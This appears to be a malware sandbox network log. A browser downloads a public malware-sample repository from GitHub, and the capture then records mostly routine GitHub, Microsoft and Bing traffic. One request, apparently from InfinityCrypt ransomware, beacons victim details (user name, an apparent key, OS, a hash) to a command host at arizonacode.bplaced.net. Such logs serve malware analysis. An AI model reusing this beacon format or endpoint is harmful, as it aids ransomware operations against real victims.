date: Thu, 29 Feb 2024 15:32:47 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 1
x-timer: S1709220767.364233,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 0a43ee64ecb0bde073eea8da8b158261bb822c0a
expires: Thu, 29 Feb 2024 15:37:47 GMT
source-age: 192448
vary: Authorization,Accept-Encoding
content-length: 1883
-
Remote address:8.8.8.8:53Requestuser-images.githubusercontent.comIN AResponseuser-images.githubusercontent.comIN A185.199.108.133user-images.githubusercontent.comIN A185.199.109.133user-images.githubusercontent.comIN A185.199.110.133user-images.githubusercontent.comIN A185.199.111.133
-
Remote address:8.8.8.8:53Requestcamo.githubusercontent.comIN AResponsecamo.githubusercontent.comIN A185.199.110.133camo.githubusercontent.comIN A185.199.111.133camo.githubusercontent.comIN A185.199.109.133camo.githubusercontent.comIN A185.199.108.133
-
Remote address:8.8.8.8:53Request4.121.82.140.in-addr.arpaIN PTRResponse4.121.82.140.in-addr.arpaIN PTRlb-140-82-121-4-fragithubcom
-
Remote address:8.8.8.8:53Request154.108.199.185.in-addr.arpaIN PTRResponse154.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-154githubcom
-
Remote address:8.8.8.8:53Request133.108.199.185.in-addr.arpaIN PTRResponse133.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-133githubcom
-
Remote address:8.8.8.8:53Requestcollector.github.comIN AResponsecollector.github.comIN CNAMEglb-db52c2cf8be544.github.comglb-db52c2cf8be544.github.comIN A140.82.112.22
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1136
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002727
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F7B1:F1A09:266735:3ED573:65E0A39F
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1044
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003465
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F7B1:F1A09:266735:3ED572:65E0A39F
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1487
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002539
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F7B1:F1A09:266744:3ED588:65E0A39F
-
Remote address:185.199.108.154:443RequestGET /favicons/favicon.svg HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Thu, 19 Oct 2023 22:56:36 GMT
etag: 0x8DBD0F6A5D50EA4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:47 GMT
age: 208
x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600054-LCY
x-cache: HIT, HIT
x-cache-hits: 4830742, 11
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3e9b07b12e583e4a90b055c4fc3bb7917762203b
content-length: 959
-
Remote address:185.199.108.154:443RequestGET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Thu, 19 Oct 2023 22:56:17 GMT
etag: 0x8DBD0F69A3B5496
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:47 GMT
age: 4335163
x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600054-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 8989
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a8169445a3535bdfa730f9e39c58ce785f37584d
content-length: 14426
-
Remote address:185.199.108.154:443RequestGET /favicons/favicon.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Thu, 19 Oct 2023 22:56:36 GMT
etag: 0x8DBD0F6A5D47312
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:47 GMT
age: 61
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600054-LCY
x-cache: HIT, HIT
x-cache-hits: 2372076, 4
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8dcd9fe8620f8c989e2bb8ba728733b3bbf7ea94
content-length: 958
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A140.82.121.5
-
Remote address:140.82.121.5:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 57620
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1709224367
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D636:D9581:488C791:496151A:65E0A39F
-
Remote address:140.82.121.5:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 190
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:54 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1709224374
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D636:D9581:488E9EC:49637AF:65E0A39F
-
Remote address:8.8.8.8:53Request22.112.82.140.in-addr.arpaIN PTRResponse22.112.82.140.in-addr.arpaIN PTRlb-140-82-112-22-iadgithubcom
-
Remote address:8.8.8.8:53Request5.121.82.140.in-addr.arpaIN PTRResponse5.121.82.140.in-addr.arpaIN PTRlb-140-82-121-5-fragithubcom
-
Remote address:8.8.8.8:53Requestcodeload.github.comIN AResponsecodeload.github.comIN A140.82.121.10
-
Remote address:140.82.121.10:443RequestGET /Endermanch/MalwareDatabase/zip/refs/heads/master HTTP/2.0
host: codeload.github.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
content-disposition: attachment; filename=MalwareDatabase-master.zip
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/zip
cross-origin-resource-policy: cross-origin
etag: W/"878e96b6f5714bd350b6f508da03acd18f289e0d873fdcbbab64cfddd75ecb4d"
strict-transport-security: max-age=31536000
vary: Authorization,Accept-Encoding,Origin
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
date: Thu, 29 Feb 2024 15:32:57 GMT
x-github-request-id: DC88:0DF5:905EB3:A77781:65E0A3A8
-
Remote address:8.8.8.8:53Request10.121.82.140.in-addr.arpaIN PTRResponse10.121.82.140.in-addr.arpaIN PTRlb-140-82-121-10-fragithubcom
-
Remote address:8.8.8.8:53Request25.73.42.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A140.82.121.6
-
Remote address:8.8.8.8:53Requestcollector.github.comIN AResponsecollector.github.comIN CNAMEglb-db52c2cf8be544.github.comglb-db52c2cf8be544.github.comIN A140.82.112.22
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1414
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003120
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: C20D:5DCA:27E5FD:40B79A:65E0A47A
-
Remote address:140.82.121.6:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 277
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:36:26 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1709224586
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D35B:0EBD:4006D35:40C2F97:65E0A47A
-
Remote address:8.8.8.8:53Request6.121.82.140.in-addr.arpaIN PTRResponse6.121.82.140.in-addr.arpaIN PTRlb-140-82-121-6-fragithubcom
-
Remote address:8.8.8.8:53Requestarizonacode.bplaced.netIN AResponsearizonacode.bplaced.netIN A162.55.0.137
-
Remote address:8.8.8.8:53Requestarizonacode.bplaced.netIN AResponsearizonacode.bplaced.netIN A162.55.0.137
-
GEThttp://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CJMzWoxXx1MeVxXxjM5gxXxpWOkxXxLil7xXxP5tbxXx%7CMicrosoft%20Windows%2010%20Pro%7C67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F%7C3193Endermanch@InfinityCrypt.exeRemote address:162.55.0.137:80RequestGET /rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CJMzWoxXx1MeVxXxjM5gxXxpWOkxXxLil7xXxP5tbxXx%7CMicrosoft%20Windows%2010%20Pro%7C67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F%7C3193 HTTP/1.1
Referer: http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt|Admin|JMzWoxXx1MeVxXxjM5gxXxpWOkxXxLil7xXxP5tbxXx|Microsoft Windows 10 Pro|67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F|3193
Host: arizonacode.bplaced.net
Connection: Keep-Alive
ResponseHTTP/1.1 403 Forbidden
Server: Apache
X-BP-NSA-REQID: (null) a.14UID=85
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
ETag: "1bbf-5ea8944ceff23"
Accept-Ranges: bytes
Content-Length: 7103
Vary: Accept-Encoding
Keep-Alive: timeout=4, max=500
Content-Type: text/html
-
Remote address:8.8.8.8:53Request137.0.55.162.in-addr.arpaIN PTRResponse137.0.55.162.in-addr.arpaIN PTRmxbplacednet
-
Remote address:8.8.8.8:53Requestcxcs.microsoft.netIN AResponsecxcs.microsoft.netIN CNAMEcxcs.microsoft.net.edgekey.netcxcs.microsoft.net.edgekey.netIN CNAMEe3230.b.akamaiedge.nete3230.b.akamaiedge.netIN A2.20.37.224
-
GEThttps://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktopRemote address:2.20.37.224:443RequestGET /api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/2.0
host: cxcs.microsoft.net
accept-encoding: gzip, deflate
ResponseHTTP/2.0 200
server: Kestrel
access-control-allow-origin: https://compass-ssl.microsoft.com
etag: "b5518f92231fbf08e2966ce082492f8c"
arr-disable-session-affinity: True
vary: Accept-Encoding
content-encoding: gzip
cache-control: public, max-age=37652
date: Thu, 29 Feb 2024 15:38:24 GMT
content-length: 2280
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 2292
content-type: application/json; charset=UTF-8
cache-control: no-cache
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a4f090ad44c8b65f8decf1fb7171
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:38:24 GMT
set-cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; domain=.bing.com; expires=Tue, 25-Mar-2025 15:38:24 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3D5A1FC279D364EE3BB40BF678B46555; expires=Tue, 25-Mar-2025 15:38:24 GMT; path=/
set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:38:24 GMT; path=/
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sat, 28-Feb-2026 15:38:24 GMT; path=/
set-cookie: SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; domain=.bing.com; expires=Sat, 28-Feb-2026 15:38:24 GMT; path=/
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Sat, 28-Feb-2026 15:38:24 GMT; path=/
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sat, 28-Feb-2026 15:38:24 GMT; path=/
set-cookie: _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221104.13600892
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 2292
content-type: application/json; charset=UTF-8
cache-control: no-cache
cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; SRCHUSR=DOB=20240229; SRCHHPGUSR=SRCHLANG=en; _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; MUIDB=3D5A1FC279D364EE3BB40BF678B46555
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a4f96deb4794948b4f31110b185f
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:38:33 GMT
set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221113.13603909
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 679
content-type: application/json; charset=UTF-8
cache-control: no-cache
cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; SRCHUSR=DOB=20240229; SRCHHPGUSR=SRCHLANG=en; _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; MUIDB=3D5A1FC279D364EE3BB40BF678B46555
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a50278764a1d9abbf1e8f6d9f72d
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:38:43 GMT
set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221122.1360864f
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 2222
content-type: application/json; charset=UTF-8
cache-control: no-cache
cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; SRCHUSR=DOB=20240229; SRCHHPGUSR=SRCHLANG=en; _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; MUIDB=3D5A1FC279D364EE3BB40BF678B46555
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a50a001545b793029b9f33ae3bf9
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:38:50 GMT
